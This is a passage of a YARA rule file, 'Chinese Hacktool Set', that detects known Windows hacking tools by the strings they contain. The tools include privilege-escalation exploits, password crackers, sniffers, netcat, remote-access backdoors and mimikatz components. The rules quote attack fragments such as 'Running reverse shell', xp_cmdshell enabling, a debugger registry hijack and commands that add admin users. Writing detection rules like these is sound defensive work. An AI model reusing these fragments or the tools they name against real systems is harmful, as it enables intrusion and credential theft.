fullword ascii $s4 = "[ ] Creating evil window" fullword ascii $s5 = "%sHANDLEF_INDESTROY" fullword ascii $s6 = "[+] Set to %d exploit half succeeded" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 4 of them } rule Dos_ch { meta: description = "Chinese Hacktool Set - file ch.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "60bbb87b08af840f21536b313a76646e7c1f0ea7" strings: $s0 = "/Churraskito/-->Usage: Churraskito.exe \"command\" " fullword ascii $s4 = "fuck,can't find WMI process PID." fullword ascii $s5 = "/Churraskito/-->Found token %s " fullword ascii $s8 = "wmiprvse.exe" fullword ascii $s10 = "SELECT * FROM IIsWebInfo" fullword ascii $s17 = "WinSta0\\Default" fullword ascii /* Goodware String - occured 22 times */ condition: uint16(0) == 0x5a4d and filesize < 260KB and 3 of them } rule DUBrute_DUBrute { meta: description = "Chinese Hacktool Set - file DUBrute.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65" strings: $s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii $s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii $s3 = "Create %d IP@Loginl;Password" fullword ascii $s4 = "UBrute.com" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1020KB and all of them } rule CookieTools { meta: description = "Chinese Hacktool Set - file CookieTools.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b6a3727fe3d214f4fb03aa43fb2bc6fadc42c8be" strings: $s0 = "http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=" fullword ascii $s2 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide $s3 = "Connection Closed Gracefully.;Could not bind socket. 
Address and port are alread" wide $s8 = "OnGetPasswordP" fullword ascii $s12 = "http://www.chinesehack.org/" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 5000KB and 2 of them } rule update_PcInit { meta: description = "Chinese Hacktool Set - file PcInit.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "a6facc4453f8cd81b8c18b3b3004fa4d8e2f5344" strings: $s1 = "\\svchost.exe" fullword ascii $s2 = "%s%08x.001" fullword ascii $s3 = "Global\\ps%08x" fullword ascii $s4 = "drivers\\" fullword ascii /* Goodware String - occured 2 times */ $s5 = "StrStrA" fullword ascii /* Goodware String - occured 43 times */ $s6 = "StrToIntA" fullword ascii /* Goodware String - occured 44 times */ condition: uint16(0) == 0x5a4d and filesize < 50KB and all of them } rule dat_NaslLib { meta: description = "Chinese Hacktool Set - file NaslLib.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "fb0d4263118faaeed2d68e12fab24c59953e862d" strings: $s1 = "nessus_get_socket_from_connection: fd <%d> is closed" fullword ascii $s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" fullword ascii $s3 = "A FsSniffer backdoor seems to be running on this port%s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1360KB and all of them } rule Dos_1 { meta: description = "Chinese Hacktool Set - file 1.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b554f0687a12ec3a137f321cc15e052ff219f28c" strings: $s1 = "/churrasco/-->Usage: Churrasco.exe \"command to run\"" fullword ascii $s2 = "/churrasco/-->Done, command should have ran as SYSTEM!" 
fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule OtherTools_servu { meta: description = "Chinese Hacktool Set - file svu.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "5c64e6879a9746a0d65226706e0edc7a" strings: $s0 = "MZKERNEL32.DLL" fullword ascii $s1 = "UpackByDwing@" fullword ascii $s2 = "GetProcAddress" fullword ascii $s3 = "WriteFile" fullword ascii condition: $s0 at 0 and filesize < 50KB and all of them } rule ustrrefadd { meta: description = "Chinese Hacktool Set - file ustrrefadd.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b371b122460951e74094f3db3016264c9c8a0cfa" strings: $s0 = "E-Mail : admin@luocong.com" fullword ascii $s1 = "Homepage: http://www.luocong.com" fullword ascii $s2 = ": %d - " fullword ascii $s3 = "ustrreffix.dll" fullword ascii $s5 = "Ultra String Reference plugin v%d.%02d" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 320KB and all of them } rule XScanLib { meta: description = "Chinese Hacktool Set - file XScanLib.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "c5cb4f75cf241f5a9aea324783193433a42a13b0" strings: $s4 = "XScanLib.dll" fullword ascii $s6 = "Ports/%s/%d" fullword ascii $s8 = "DEFAULT-TCP-PORT" fullword ascii $s9 = "PlugCheckTcpPort" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 360KB and all of them } rule IDTools_For_WinXP_IdtTool { meta: description = "Chinese Hacktool Set - file IdtTool.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ebab6e4cb7ea82c8dc1fe4154e040e241f4672c6" strings: $s2 = "IdtTool.sys" fullword ascii $s4 = "Idt Tool bY tMd[CsP]" fullword wide $s6 = "\\\\.\\slIdtTool" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 25KB and all of them } rule GoodToolset_ms11046 { meta: description = "Chinese Hacktool Set - file ms11046.exe" author = 
"Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "f8414a374011fd239a6c6d9c6ca5851cd8936409" strings: $s1 = "[*] Token system command" fullword ascii $s2 = "[*] command add user 90sec 90sec" fullword ascii $s3 = "[*] Add to Administrators success" fullword ascii $s4 = "[*] User has been successfully added" fullword ascii $s5 = "Program: %s%s%s%s%s%s%s%s%s%s%s" fullword ascii /* Goodware String - occured 3 times */ condition: uint16(0) == 0x5a4d and filesize < 840KB and 2 of them } rule Cmdshell32 { meta: description = "Chinese Hacktool Set - file Cmdshell32.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "3c41116d20e06dcb179e7346901c1c11cd81c596" strings: $s1 = "cmdshell.exe" fullword wide $s2 = "cmdshell" fullword ascii $s3 = "[Root@CmdShell ~]#" fullword wide condition: uint16(0) == 0x5a4d and filesize < 62KB and all of them } rule Sniffer_analyzer_SSClone_1210_full_version { meta: description = "Chinese Hacktool Set - file Sniffer analyzer SSClone 1210 full version.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "6882125babb60bd0a7b2f1943a40b965b7a03d4e" strings: $s0 = "http://www.vip80000.com/hot/index.html" fullword ascii $s1 = "GetConnectString" fullword ascii $s2 = "CnCerT.Safe.SSClone.dll" fullword ascii $s3 = "(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 3580KB and all of them } rule x64_klock { meta: description = "Chinese Hacktool Set - file klock.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc" strings: $s1 = "Bienvenue dans un processus distant" fullword wide $s2 = "klock.dll" fullword ascii $s3 = "Erreur : le bureau courant (" fullword wide $s4 = "klock de mimikatz pour Windows" fullword wide condition: uint16(0) == 0x5a4d and filesize < 907KB and all of them } 
rule Dos_Down32 { meta: description = "Chinese Hacktool Set - file Down32.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "0365738acd728021b0ea2967c867f1014fd7dd75" strings: $s2 = "C:\\Windows\\Temp\\Cmd.txt" fullword wide $s6 = "down.exe" fullword wide $s15 = "get_Form1" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 137KB and all of them } rule MarathonTool_2 { meta: description = "Chinese Hacktool Set - file MarathonTool.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "75b5d25cdaa6a035981e5a33198fef0117c27c9c" strings: $s3 = "http://localhost/retomysql/pista.aspx?id_pista=1" fullword wide $s6 = "SELECT ASCII(SUBSTR(username,{0},1)) FROM USER_USERS" fullword wide $s17 = "/Blind SQL injection tool based in heavy queries" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule Tools_termsrv { meta: description = "Chinese Hacktool Set - file termsrv.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "294a693d252f8f4c85ad92ee8c618cebd94ef247" strings: $s1 = "Iv\\SmSsWinStationApiPort" fullword ascii $s2 = " TSInternetUser " fullword wide $s3 = "KvInterlockedCompareExchange" fullword ascii $s4 = " WINS/DNS " fullword wide $s5 = "winerror=%1" fullword wide $s6 = "TermService " fullword wide condition: uint16(0) == 0x5a4d and filesize < 1150KB and all of them } rule scanms_scanms { meta: description = "Chinese Hacktool Set - file scanms.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "47787dee6ddea2cb44ff27b6a5fd729273cea51a" strings: $s1 = "--- ScanMs Tool --- (c) 2003 Internet Security Systems ---" fullword ascii $s2 = "Scans for systems vulnerable to MS03-026 vuln" fullword ascii $s3 = "More accurate for WinXP/Win2k, less accurate for WinNT" fullword ascii /* PEStudio Blacklist: os */ $s4 = "added %d.%d.%d.%d-%d.%d.%d.%d" fullword ascii $s5 
= "Internet Explorer 1.0" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and 3 of them } rule CN_Tools_PcShare { meta: description = "Chinese Hacktool Set - file PcShare.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ee7ba9784fae413d644cdf5a093bd93b73537652" strings: $s0 = "title=%s%s-%s;id=%s;hwnd=%d;mainhwnd=%d;mainprocess=%d;cmd=%d;" fullword wide $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide $s2 = "http://www.pcshares.cn/pcshare200/lostpass.asp" fullword wide $s5 = "port=%s;name=%s;pass=%s;" fullword wide $s16 = "%s\\ini\\*.dat" fullword wide $s17 = "pcinit.exe" fullword wide $s18 = "http://www.pcshare.cn" fullword wide condition: uint16(0) == 0x5a4d and filesize < 6000KB and 3 of them } rule pw_inspector { meta: description = "Chinese Hacktool Set - file pw-inspector.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "4f8e3e101098fc3da65ed06117b3cb73c0a66215" strings: $s1 = "-m MINLEN minimum length of a valid password" fullword ascii $s2 = "http://www.thc.org" fullword ascii $s3 = "Use for hacking: trim your dictionary file to the pw requirements of the target." fullword ascii condition: uint16(0) == 0x5a4d and filesize < 460KB and all of them } rule Dll_LoadEx { meta: description = "Chinese Hacktool Set - file Dll_LoadEx.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "213d9d0afb22fe723ff570cf69ff8cdb33ada150" strings: $s0 = "WiNrOOt@126.com" fullword wide $s1 = "Dll_LoadEx.EXE" fullword wide $s3 = "You Already Loaded This DLL ! :(" fullword ascii $s10 = "Dll_LoadEx Microsoft " fullword wide $s17 = "Can't Load This Dll ! :(" fullword ascii $s18 = "WiNrOOt" fullword wide $s20 = " Dll_LoadEx(&A)..." 
fullword wide condition: uint16(0) == 0x5a4d and filesize < 120KB and 3 of them } rule dat_report { meta: description = "Chinese Hacktool Set - file report.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "4582a7c1d499bb96dad8e9b227e9d5de9becdfc2" strings: $s1 = "<a href=\"http://www.xfocus.net\">X-Scan</a>" fullword ascii $s2 = "REPORT-ANALYSIS-OF-HOST" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 480KB and all of them } rule Dos_iis7 { meta: description = "Chinese Hacktool Set - file iis7.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978" strings: $s0 = "\\\\localhost" fullword ascii $s1 = "iis.run" fullword ascii $s3 = ">Could not connecto %s" fullword ascii $s5 = "WHOAMI" ascii $s13 = "WinSta0\\Default" fullword ascii /* Goodware String - occured 22 times */ condition: uint16(0) == 0x5a4d and filesize < 140KB and all of them } rule SwitchSniffer { meta: description = "Chinese Hacktool Set - file SwitchSniffer.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "1e7507162154f67dff4417f1f5d18b4ade5cf0cd" strings: $s0 = "NextSecurity.NET" fullword wide $s2 = "SwitchSniffer Setup" fullword wide condition: uint16(0) == 0x5a4d and all of them } rule dbexpora { meta: description = "Chinese Hacktool Set - file dbexpora.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b55b007ef091b2f33f7042814614564625a8c79f" strings: $s0 = "SELECT A.USER FROM SYS.USER_USERS A " fullword ascii $s12 = "OCI 8 - OCIDescriptorFree" fullword ascii $s13 = "ORACommand *" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 835KB and all of them } rule SQLCracker { meta: description = "Chinese Hacktool Set - file SQLCracker.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = 
"1aa5755da1a9b050c4c49fc5c58fa133b8380410" strings: $s0 = "msvbvm60.dll" fullword ascii /* reversed goodware string 'lld.06mvbvsm' */ $s1 = "_CIcos" fullword ascii $s2 = "kernel32.dll" fullword ascii $s3 = "cKmhV" fullword ascii $s4 = "080404B0" fullword wide condition: uint16(0) == 0x5a4d and filesize < 125KB and all of them } rule FreeVersion_debug { meta: description = "Chinese Hacktool Set - file debug.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d11e6c6f675b3be86e37e50184dadf0081506a89" strings: $s0 = "c:\\Documents and Settings\\Administrator\\" fullword ascii $s1 = "Got WMI process Pid: %d" ascii $s2 = "This exploit will execute" ascii $s6 = "Found token %s " ascii $s7 = "Running reverse shell" ascii $s10 = "wmiprvse.exe" fullword ascii $s12 = "SELECT * FROM IIsWebInfo" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 820KB and 3 of them } rule Dos_look { meta: description = "Chinese Hacktool Set - file look.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e1a37f31170e812185cf00a838835ee59b8f64ba" strings: $s1 = "<description>CHKen QQ:41901298</description>" fullword ascii $s2 = "version=\"9.9.9.9\"" fullword ascii $s3 = "name=\"CH.Ken.Tool\"" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 40KB and all of them } rule NtGodMode { meta: description = "Chinese Hacktool Set - file NtGodMode.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "8baac735e37523d28fdb6e736d03c67274f7db77" strings: $s0 = "to HOST!" 
fullword ascii $s1 = "SS.EXE" fullword ascii $s5 = "lstrlen0" fullword ascii $s6 = "Virtual" fullword ascii /* Goodware String - occured 6 times */ $s19 = "RtlUnw" fullword ascii /* Goodware String - occured 1 times */ condition: uint16(0) == 0x5a4d and filesize < 45KB and all of them } rule Dos_NC { meta: description = "Chinese Hacktool Set - file NC.EXE" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "57f0839433234285cc9df96198a6ca58248a4707" strings: $s1 = "nc -l -p port [options] [hostname] [port]" fullword ascii $s2 = "invalid connection to [%s] from %s [%s] %d" fullword ascii $s3 = "post-rcv getsockname failed" fullword ascii $s4 = "Failed to execute shell, error = %s" fullword ascii $s5 = "UDP listen needs -p arg" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 290KB and all of them } rule WebCrack4_RouterPasswordCracking { meta: description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638" strings: $s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" fullword ascii $s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" fullword ascii $s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" fullword ascii $s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" fullword ascii $s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide condition: uint16(0) == 0x5a4d and filesize < 5000KB and 2 of them } rule HScan_v1_20_oncrpc { meta: description = "Chinese Hacktool Set - file oncrpc.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "e8f047eed8d4f6d2f5dbaffdd0e6e4a09c5298a2" strings: $s1 = "clnt_raw.c - Fatal header serialization error." 
fullword ascii $s2 = "svctcp_.c - cannot getsockname or listen" fullword ascii $s3 = "too many connections (%d), compilation constant FD_SETSIZE was only %d" fullword ascii $s4 = "svc_run: - select failed" fullword ascii $s5 = "@(#)bindresvport.c" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 340KB and 4 of them } rule hscan_gui { meta: description = "Chinese Hacktool Set - file hscan-gui.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "1885f0b7be87f51c304b39bc04b9423539825c69" strings: $s0 = "Hscan.EXE" fullword wide $s1 = "RestTool.EXE" fullword ascii $s3 = "Hscan Application " fullword wide condition: uint16(0) == 0x5a4d and filesize < 550KB and all of them } rule S_MultiFunction_Scanners_s { meta: description = "Chinese Hacktool Set - file s.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355" strings: $s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii $s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii $s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii $s3 = "explorer.exe http://www.hackdos.com" fullword ascii $s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii $s5 = "Failed to read file or invalid data in file!" fullword ascii $s6 = "www.hackdos.com" fullword ascii $s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii $s11 = "The interface of kernel library is invalid!" fullword ascii $s12 = "eventvwr" fullword ascii $s13 = "Failed to decompress data!" 
fullword ascii $s14 = "NOTEPAD.EXE result.txt" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 8000KB and 4 of them } rule Dos_GetPass { meta: description = "Chinese Hacktool Set - file GetPass.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d18d952b24110b83abd17e042f9deee679de6a1a" strings: $s0 = "GetLogonS" ascii $s3 = "/showthread.php?t=156643" ascii $s8 = "To Run As Administ" ascii $s18 = "EnableDebugPrivileg" fullword ascii $s19 = "sedebugnameValue" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 890KB and all of them } rule update_PcMain { meta: description = "Chinese Hacktool Set - file PcMain.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa" strings: $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii $s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii $s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii $s3 = "\\svchost.exe -k " fullword ascii $s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii $s9 = "Global\\%s-key-event" fullword ascii $s10 = "%d%d.exe" fullword ascii $s14 = "%d.exe" fullword ascii $s15 = "Global\\%s-key-metux" fullword ascii $s18 = "GET / HTTP/1.1" fullword ascii $s19 = "\\Services\\" fullword ascii $s20 = "qy001id=%d;qy001guid=%s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 500KB and 4 of them } rule Dos_sys { meta: description = "Chinese Hacktool Set - file sys.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b5837047443f8bc62284a0045982aaae8bab6f18" strings: $s0 = "'SeDebugPrivilegeOpen " fullword ascii $s6 = "Author: Cyg07*2" fullword ascii $s12 = "from golds7n[LAG]'J" fullword ascii $s14 = "DAMAGE" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule dat_xpf { meta: description = 
"Chinese Hacktool Set - file xpf.sys" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "761125ab594f8dc996da4ce8ce50deba49c81846" strings: $s1 = "UnHook IoGetDeviceObjectPointer ok!" fullword ascii $s2 = "\\Device\\XScanPF" fullword wide $s3 = "\\DosDevices\\XScanPF" fullword wide condition: uint16(0) == 0x5a4d and filesize < 25KB and all of them } rule Project1 { meta: description = "Chinese Hacktool Set - file Project1.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96" strings: $s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii $s2 = "Password.txt" fullword ascii $s3 = "LoginPrompt" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 5000KB and all of them } rule Arp_EMP_v1_0 { meta: description = "Chinese Hacktool Set - file Arp EMP v1.0.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee" strings: $s0 = "Arp EMP v1.0.exe" fullword wide condition: uint16(0) == 0x5a4d and filesize < 800KB and all of them } rule CN_Tools_MyUPnP { meta: description = "Chinese Hacktool Set - file MyUPnP.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "15b6fca7e42cd2800ba82c739552e7ffee967000" strings: $s1 = "<description>BYTELINKER.COM</description>" fullword ascii $s2 = "myupnp.exe" fullword ascii $s3 = "LOADER ERROR" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1500KB and all of them } rule CN_Tools_Shiell { meta: description = "Chinese Hacktool Set - file Shiell.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "b432d80c37abe354d344b949c8730929d8f9817a" strings: $s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii $s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide $s3 = "Shift shell.exe" 
fullword wide $s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1500KB and 2 of them } rule cndcom_cndcom { meta: description = "Chinese Hacktool Set - file cndcom.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "08bbe6312342b28b43201125bd8c518531de8082" strings: $s1 = "- Rewritten by HDM last <hdm [at] metasploit.com>" fullword ascii $s2 = "- Usage: %s <Target ID> <Target IP>" fullword ascii $s3 = "- Remote DCOM RPC Buffer Overflow Exploit" fullword ascii $s4 = "- Warning:This Code is more like a dos tool!(Modify by pingker)" fullword ascii $s5 = "Windows NT SP6 (Chinese)" fullword ascii $s6 = "- Original code by FlashSky and Benjurry" fullword ascii $s7 = "\\C$\\123456111111111111111.doc" fullword wide $s8 = "shell3all.c" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 100KB and 2 of them } rule IsDebug_V1_4 { meta: description = "Chinese Hacktool Set - file IsDebug V1.4.dll" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ca32474c358b4402421ece1cb31714fbb088b69a" strings: $s0 = "IsDebug.dll" fullword ascii $s1 = "SV Dumper V1.0" fullword wide $s2 = "(IsDebuggerPresent byte Patcher)" fullword ascii $s8 = "Error WriteMemory failed" fullword ascii $s9 = "IsDebugPresent" fullword ascii $s10 = "idb_Autoload" fullword ascii $s11 = "Bin Files" fullword ascii $s12 = "MASM32 version" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 30KB and all of them } rule HTTPSCANNER { meta: description = "Chinese Hacktool Set - file HTTPSCANNER.EXE" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "ae2929346944c1ea3411a4562e9d5e2f765d088a" strings: $s1 = "HttpScanner.exe" fullword wide $s2 = "HttpScanner" fullword wide condition: uint16(0) == 0x5a4d and filesize < 3500KB and all of them } rule HScan_v1_20_PipeCmd { meta: description = "Chinese Hacktool Set - file PipeCmd.exe" author = 
"Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "64403ce63b28b544646a30da3be2f395788542d6" strings: $s1 = "%SystemRoot%\\system32\\PipeCmdSrv.exe" fullword ascii $s2 = "PipeCmd.exe" fullword wide $s3 = "Please Use NTCmd.exe Run This Program." fullword ascii $s4 = "%s\\pipe\\%s%s%d" fullword ascii $s5 = "\\\\.\\pipe\\%s%s%d" fullword ascii $s6 = "%s\\ADMIN$\\System32\\%s%s" fullword ascii $s7 = "This is a service executable! Couldn't start directly." fullword ascii $s8 = "Connecting to Remote Server ...Failed" fullword ascii $s9 = "PIPECMDSRV" fullword wide condition: uint16(0) == 0x5a4d and filesize < 200KB and 4 of them } rule Dos_fp { meta: description = "Chinese Hacktool Set - file fp.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c" strings: $s1 = "fpipe -l 53 -s 53 -r 80 192.168.1.101" fullword ascii $s2 = "FPipe.exe" fullword wide $s3 = "http://www.foundstone.com" fullword ascii $s4 = "%s %s port %d. Address is already in use" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 65KB and all of them } rule Dos_netstat { meta: description = "Chinese Hacktool Set - file netstat.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d0444b7bd936b5fc490b865a604e97c22d97e598" strings: $s0 = "w03a2409.dll" fullword ascii $s1 = "Retransmission Timeout Algorithm = unknown (%1!u!)" fullword wide /* Goodware String - occured 2 times */ $s2 = "Administrative Status = %1!u!" fullword wide /* Goodware String - occured 2 times */ $s3 = "Packet Too Big %1!-10u! %2!-10u!" 
fullword wide /* Goodware String - occured 2 times */ condition: uint16(0) == 0x5a4d and filesize < 150KB and all of them } rule CN_Tools_xsniff { meta: description = "Chinese Hacktool Set - file xsniff.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "d61d7329ac74f66245a92c4505a327c85875c577" strings: $s0 = "xsiff.exe -pass -hide -log pass.log" fullword ascii $s1 = "HOST: %s USER: %s, PASS: %s" fullword ascii $s2 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii $s10 = "Code by glacier <glacier@xfocus.org>" fullword ascii $s11 = "%-5s%s->%s Bytes=%d TTL=%d Type: %d,%d ID=%d SEQ=%d" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 220KB and 2 of them } rule MSSqlPass { meta: description = "Chinese Hacktool Set - file MSSqlPass.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7" strings: $s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide $s1 = "empv.exe" fullword wide $s2 = "Enterprise Manager PassView" fullword wide condition: uint16(0) == 0x5a4d and filesize < 120KB and all of them } rule WSockExpert { meta: description = "Chinese Hacktool Set - file WSockExpert.exe" author = "Florian Roth" reference = "http://tools.zjqhr.com/" date = "2015-06-13" hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf" strings: $s1 = "OpenProcessCmdExecute!" 
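fullword ascii
        $s2 = "http://www.hackp.com" fullword ascii
        $s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide
        $s4 = "SaveSelectedFilterCmdExecute" fullword ascii
        $s5 = "PasswordChar@" fullword ascii
        $s6 = "WSockHook.DLL" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 2500KB and 4 of them
}

/* Rules below: "Chinese Hacktool Set" (Florian Roth, 2015-06-13).
   Every rule gates on uint16(0) == 0x5a4d (PE "MZ" header) plus a filesize
   bound; the filesize bound is what keeps the generic import/loader strings
   used by some of these rules from matching arbitrary PE files. */

rule Ms_Viru_racle {
    meta:
        description = "Chinese Hacktool Set - file racle.dll"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "13116078fff5c87b56179c5438f008caf6c98ecb"
    strings:
        $s0 = "PsInitialSystemProcess @%p" fullword ascii
        $s1 = "PsLookupProcessByProcessId(%u) Failed" fullword ascii
        $s2 = "PsLookupProcessByProcessId(%u) => %p" fullword ascii
        $s3 = "FirstStage() Loaded, CurrentThread @%p Stack %p - %p" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 210KB and all of them
}

rule lamescan3 {
    meta:
        description = "Chinese Hacktool Set - file lamescan3.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
        hash = "3130eefb79650dab2e323328b905e4d5d3a1d2f0"
    strings:
        $s1 = "dic\\loginlist.txt" fullword ascii
        $s2 = "Radmin.exe" fullword ascii
        $s3 = "lamescan3.pdf!" fullword ascii
        $s4 = "dic\\passlist.txt" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 3740KB and all of them
}

rule CN_Tools_pc {
    meta:
        description = "Chinese Hacktool Set - file pc.exe"
        author = "Florian Roth"
        reference = "http://tools.zjqhr.com/"
        date = "2015-06-13"
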